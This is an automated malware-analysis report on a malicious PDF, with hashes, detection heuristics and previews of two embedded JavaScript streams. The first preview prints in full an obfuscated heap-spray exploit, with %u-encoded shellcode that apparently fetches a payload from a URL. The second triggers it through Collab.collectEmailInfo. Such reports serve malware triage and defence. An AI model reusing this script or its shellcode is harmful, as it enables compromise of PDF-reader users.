PDF malware analysis — malicious · f8cdf2e989591b48

MALICIOUS

PDF

6.1 KB Created: 2010-02-19 16:37:54 +03:00 First seen: 2026-05-10

MD5: 4a9a4e8c294c40e7a4bc72257afe3f87 SHA-1: ca94a83a365c08780a01a166ecbfbbd17b6fcf8b SHA-256: f8cdf2e989591b48d8ec45e5df7cae2ac926d7fef7f45b3e2167986532f2dc0a

150 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The unescape() function call suggests obfuscation of the script's content. Two JavaScript files were extracted, javascript_obj111111_000.js and javascript_obj111112_001.js. The primary function of the embedded JavaScript appears to be the execution of further malicious code, likely a downloader or dropper, based on the presence of obfuscated scripts and extracted files. The benign URLs present do not contribute to the malicious functionality.

Machine Learning

Nyx PDF Classifier malicious score 0.9998

Heuristics 5

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
hvalxw=unescape(hvalxw);
```
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj111111_000.js`	pdf-javascript-stream	PDF /JS object 111111 at offset 0x1C9	2228 bytes
SHA-256: `f6f246aa6313499d3aaf9362edadd690f8789e496d2a754a06bfdfd66bfb7952`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 3 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script var hvalxw = 'ARG0c0cARG0c0c'.replace(/ARG/g,'%u'); var iraokoi = 'ARG9090ARG9090'.replace(/ARG/g,'%u'); var ftitj6 = 'Z535XZ5251Z5756Z9c55ZXXe8ZXXXXZ5dXXZed83Z31XdZ64cXZ4XX3Z783XZ8bXcZXc4XZ7X8bZad1cZ4X8bZebX8Z8bX9Z344XZ4X8dZ8b7cZ3c4XZ5756Z5ebeZXXX1ZX1XXZbfeeZX14eZXXXXZefX1Zd6e8ZXXX1Z5fXXZ895eZ81eaZ5ec2ZXXX1Z52XXZ8X68ZXXXXZffXXZ4e95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z31XXZX1f6Z8ac2Z359cZX263ZXXXXZfb8XZ74XXZ88X6Z321cZeb46Zc6eeZ32X4Z89XXZ81eaZ45c2ZXXX2Z52XXZ95ffZX152ZXXXXZea89Zc281ZX25XZXXXXZ5X52Z95ffZX156ZXXXXZXX6aZXX6aZea89Zc281ZX15eZXXXXZ8952Z81eaZ78c2ZXXX2Z52XXZXX6aZdXffZX56aZea89Zc281ZX15eZXXXXZff52Z5a95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z52XXZ8X68ZXXXXZffXXZ4e95ZXXX1Z89XXZ81eaZ5ec2ZXXX1Z31XXZX1f6Z8ac2Z359cZX26eZXXXXZfb8XZ74XXZ88X6Z321cZeb46Zc6eeZ32X4Z89XXZ81eaZ45c2ZXXX2Z52XXZ95ffZX152ZXXXXZea89Zc281ZX25XZXXXXZ5X52Z95ffZX156ZXXXXZXX6aZXX6aZea89Zc281ZX15eZXXXXZ8952Z81eaZa6c2ZXXX2Z52XXZXX6aZdXffZX56aZea89Zc281ZX15eZXXXXZff52Z5a95ZXXX1Z9dXXZ5f5dZ5a5eZ5b59Zc358ZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZ6547Z5474Z6d65Z5X7XZ7461Z4168Z4cXXZ616fZ4c64Z6269Z6172Z7972ZXX41Z6547Z5X74Z6f72Z4163Z6464Z6572Z7373Z57XXZ6e69Z7845Z6365ZbbXXZf289Zf789ZcX3XZ75aeZ29fdZ89f7Z31f9ZbecXZXX3cZXXXXZb5X3ZX21bZXXXXZad66Z85X3ZX21bZXXXXZ7X8bZ8378Z1cc6Zb5X3ZX21bZXXXXZbd8dZX21fZXXXXZX3adZ1b85ZXXX2ZabXXZX3adZ1b85ZXXX2Z5XXXZadabZ85X3ZX21bZXXXXZ5eabZdb31Z56adZ85X3ZX21bZXXXXZc689Zd789Zfc51Za6f3Z7459Z5eX4Zeb43Z5ee9Zd193ZX3eXZ2785ZXXX2Z31XXZ96f6Zad66ZeXc1ZX3X2Z1f85ZXXX2Z89XXZadc6Z85X3ZX21bZXXXXZebc3ZXX1XZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZXXXXZ89XXZ1b85ZXXX2Z56XXZe857Zff58ZffffZ5e5fZX1abZ8XceZbb3eZX274ZedebZ55c3Z4c52Z4f4dZ2e4eZ4c44ZXX4cZ5255Z444cZ776fZ6c6eZ616fZ5464Z466fZ6c69Z4165Z7XXXZ6664Z7X75Z2e64Z7865ZXX65Z7263Z7361Z2e68Z687XZXX7XZ7468Z7X74Z2F3AZ382FZ3234Z3833Z3439Z3332Z3734Z3938Z3332Z632EZ6D6FZ342FZ6C2FZ7X2EZ7X68Z693FZ343DZ9XXX'.replace(/Z/g,'%u').replace(/X/g,'0'); hvalxw=unescape(hvalxw); iraokoi=unescape(iraokoi); ftitj6=unescape(ftitj6); while (iraokoi.length * 2 < 0x3fffc8-ftitj6.length * 2){iraokoi += iraokoi;} iraokoi = iraokoi.substr(0, (0x3fffc8-ftitj6.length * 2) / 2); var xpjtbnk = new Array(); for (var hwivape = 0; hwivape < 47; hwivape ++ ){xpjtbnk[hwivape] = iraokoi + ftitj6;} while (hvalxw.length < 44952){hvalxw += hvalxw;}
`javascript_obj111112_001.js`	pdf-javascript-stream	PDF /JS object 111112 at offset 0x5AE	66 bytes
SHA-256: `dae8802d1988766c7c163e9ca5a381759ccfb667e67dc3dd4da2dfcbdb8a0f76`
Preview script First 1,000 lines of the extracted script this.collabStore = Collab.collectEmailInfo({subj:"", msg:hvalxw});

Open this report in the interactive analyzer, or submit your own file for analysis.